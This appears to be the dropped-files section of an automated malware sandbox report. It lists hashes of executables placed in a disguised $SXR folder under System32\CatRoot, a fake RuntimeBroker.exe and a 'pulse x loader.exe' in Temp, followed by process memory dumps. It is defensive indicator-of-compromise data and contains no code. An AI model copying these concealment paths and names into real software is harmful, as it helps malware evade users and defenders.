3.9MB

MD5
8531d64203df388204049aa08e1fc160

SHA1
713ee984cbddbcc1356bd3b43fa75fd1321e6220

SHA256
1992af39d714a1346301054a096880ef7a1c657c957196f5b5d435907da1bfdf

SHA512
50abaab97be4404975788cbb15a0a71c7a4c44844e5b789c25a012e60d78aa01dbb46986736ff655da0b0882b5ab0271da6474ad12c81ba0922b93f2e9c9c2db

Download Submit
C:\Windows\System32\CatRoot\$SXR\Read.txt

Filesize
58B

MD5
79668a6729f0f219835c62c9e43b7927

SHA1
0cbbc7cc8dbd27923b18285960640f3dad96d146

SHA256
6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

SHA512
bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
4.1MB

MD5
4a66a497b15cf47d7070ad1b55934707

SHA1
6e0517975ecd585899a6b2e681d7d9a517211d90

SHA256
70725500b63afba3d48e85553625f464257a963199097b0fa73390d53c12d52f

SHA512
118006a28320e42ec1140cff1dd6b927e46a7dbd2ff96fe3989f99b9a6efbacd549d9484d8d18060fe9facea54b2fad3198de6135b3654f0927275dd1a41035d

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
503KB

MD5
d7dc84d17e21bad7b9a1b27cc17dc7a3

SHA1
df1231d0f25115daa51e143011ae1516819ecfb9

SHA256
6723c6a235efa80759f73f0d7649d34afeabd2d17dbcc492a1233524f958b68a

SHA512
0795c92bac327b8c4900abb51e3b9670de1a4f5e3683bc9b2ee60b0143bf59a7d0332ac3343ab7b3913070be673e01350f85348b2607cf1d9b71a690a2b26726

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCD5AC9B0E9E34FA5B096EC3B1E36CCE.TMP

Filesize
1KB

MD5
8cb2d1f69e2730b5de634f6b6c12005f

SHA1
1f9496195f09f58a4e382994717a5da34086d770

SHA256
f5d616663ac61dc843c8663f2ceaaf6939b974ffd74e6e1be232b3fe8c6667ea

SHA512
d035c16a8d8f09abedc94e10d46983e371d2862b277128fe00184d3a1cbb8a69367c08e150c63b07729938bea6644af4e3913e629969d38978b0d934e9e61eda

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\getngk55\getngk55.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\getngk55\getngk55.cmdline

Filesize
455B

MD5
7634e18b331cd3970e0b24f2415d09f6

SHA1
dff955bd27d077606e160f62ac859e1a677fccc5

SHA256
db5f49cae418ac4355f6e33639683dd4482957177c3d54bcd6b078bc147dced5

SHA512
e582c989113326890177162adaf027271774f724aca1dfc3987f93bba1eaad6eb6caf555e6b6cbf71e2f1b182fac9551d171ff50e324f47520273a00f63a5fd6

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
3.5MB

MD5
8b7a784dda2183c2d9929c924b461dde

SHA1
ce54c000dddb30e0b7f70ef1ca23a632f5fc0b08

SHA256
63d395274f384184743c4215ac0247f01d4a1d487bc3309f44019a69daa1ca76

SHA512
5d52fa03b67524eb36c84ac41e9bd0800f1b61c222fb32750252fb73d3973c14d14395da1a96d3bce6632c32fd4ef13e4cd217782b6f21f527ee3e60583488be

Download Submit
\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe

Filesize
4KB

MD5
346e44f9bb62962c066541ae116fb9de

SHA1
3a3e78c179e6d8c6cca67789251131e6bffef573

SHA256
093157f2c3e2d29edac4f733eba0721e6e2ca2392fe503be43d764dff42447be

SHA512
9ceb62e28cefd2a7358888299a527bb6fb6f8b1f667384640d1f5eaf3d18a2c1ddf7798235024234b80945a23a8ce61ea01506883f41a119e8d6f92768412aa2

Download Submit
\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.4MB

MD5
1f60f00a428d7c6c07cff90e538b9e6c

SHA1
85d6ed4c48b836e35bea3b8292f7e455b909dea6

SHA256
de42eeb358108287d4cfa882f372d17d89f417bfdae5311a685ae15ab9b5307d

SHA512
17b0fbdfa9fc976c47011798c7ccbd3b38c1f86af3cfdd535518f0b00b244c38d860500120cf951d8acfec8c10e1a4b3039eedc6d21eb5814d9d31c41fcb54f3

Download Submit
\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
2.4MB

MD5
08c76a550813c1937ed36274c4c3f8e4

SHA1
2c3a12503b6cb47e6442a545485f4618078e5606

SHA256
465465df17398641de4ce3da17334d23854d82129dade1f53d0a643e978c9ae9

SHA512
14ea6914da9518fc12420984612a51540b1a30d4067c4f2da0887f6822ea8d41f65cc2a36836f3a01e60b000c0d35592016a88c2d1648f26d61a8ca75ed3e50a

Download Submit
\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
3.3MB

MD5
f7e3ae634ed6c1a638bea089d003e774

SHA1
ac0801aee519bcbd9a1e6cfc9f4ebd1821ab2d54

SHA256
be3cad1abd5b9a1f0d841416a0f1bf5be762d60080e326251ad3907d43d6364f

SHA512
eb1594c1110e2f75b0f85e6336faa6c1b2a208ceb97b9c4f573aa351d92df714b7500744c263c8f210d528965dbfa3191cc33fc611c69616a5bd3c2ea6936b29

Download Submit
memory/348-77-0x0000000002B90000-0x0000000002BD0000-memory.dmp

Filesize
256KB

Download
memory/348-72-0x0000000002B90000-0x0000000002BD0000-memory.dmp

Filesize
256KB

Download
memory/348-71-0x000000006EED0000-0x000000006F47B000-memory.dmp

Filesize
5.7MB

Download
memory/348-70-0x000000006EED0000-0x000000006F47B000-memory.dmp

Filesize
5.7MB

Download
memory/348-78-0x0000000002B90000-0x0000000002BD0000-memory.dmp

Filesize
256KB

Download
memory/348-81-0x000000006EED0000-0x000000006F47B000-memory.dmp

Filesize
5.7MB

Download
memory/776-51-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/776-106-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/776-58-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/776-59-0x00000000020D0000-0x0000000002110000-memory.dmp

Filesize
256KB

Download
memory/776-53-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/776-49-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/776-47-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/776-46-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/776-48-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/776-44-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/776-45-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1436-100-0x00000000042B0000-0x00000000042B1000-memory.dmp

Filesize
4KB

Download
memory/1436-190-0x0000000003D80000-0x0000000003D90000-memory.dmp

Filesize
64KB

Download
memory/1436-134-0x00000000042B0000-0x00000000042B1000-memory.dmp

Filesize
4KB

Download
memory/1744-84-0x000000001AFD0000-0x000000001B050000-memory.dmp

Filesize
512KB

Download
memory/1744-129-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

Filesize
9.9MB

Download
memory/1744-60-0x00000000010C0000-0x00000000010C8000-memory.dmp

Filesize
32KB

Download
memory/1744-68-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

Filesize
9.9MB

Download
memory/1744-131-0x000000001AFD0000-0x000000001B050000-memory.dmp

Filesize
512KB

Download
memory/2136-75-0x0000000002F70000-0x0000000002FB0000-memory.dmp

Filesize
256KB

Download
memory/2136-74-0x0000000002F70000-0x0000000002FB0000-memory.dmp

Filesize
256KB

Download
memory/2136-82-0x000000006EED0000-0x000000006F47B000-memory.dmp

Filesize
5.7MB

Download
memory/2136-73-0x0000000002F70000-0x0000000002FB0000-memory.dmp

Filesize
256KB

Download
memory/2136-76-0x000000006EED0000-0x000000006F47B000-memory.dmp

Filesize
5.7MB

Download
memory/2136-69-0x000000006EED0000-0x000000006F47B000-memory.dmp

Filesize
5.7MB

Download
memory/2180-14-0x0000000000100000-0x0000000000740000-memory.dmp

Filesize
6.2MB

Download
memory/2180-98-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/2180-83-0x0000000002490000-0x00000000024D0000-memory.dmp

Filesize
256KB

Download
memory/2180-85-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/2180-26-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/2540-31-0x0000000004AE0000-0x0000000004B20000-memory.dmp

Filesize
256KB

Download
memory/2540-87-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/2540-29-0x0000000001270000-0x00000000012F2000-memory.dmp

Filesize
520KB

Download
memory/2540-30-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/2604-27-0x000000013FAD0000-0x000000013FF0C000-memory.dmp

Filesize
4.2MB

Download
memory/2604-107-0x000000013FAD0000-0x000000013FF0C000-memory.dmp

Filesize
4.2MB

Download
memory/2604-86-0x000000013FAD0000-0x000000013FF0C000-memory.dmp

Filesize
4.2MB

Download
memory/2976-105-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/2976-133-0x0000000000B10000-0x0000000000B1E000-memory.dmp

Filesize
56KB

Download
memory/2976-108-0x00000000050C0000-0x0000000005100000-memory.dmp

Filesize
256KB

Download
memory/2976-170-0x0000000074520000-0x0000000074C0E000-memory.dmp

Filesize
6.9MB

Download
memory/2976-104-0x00000000000A0000-0x00000000006E0000-memory.dmp

Filesize
6.2MB

Download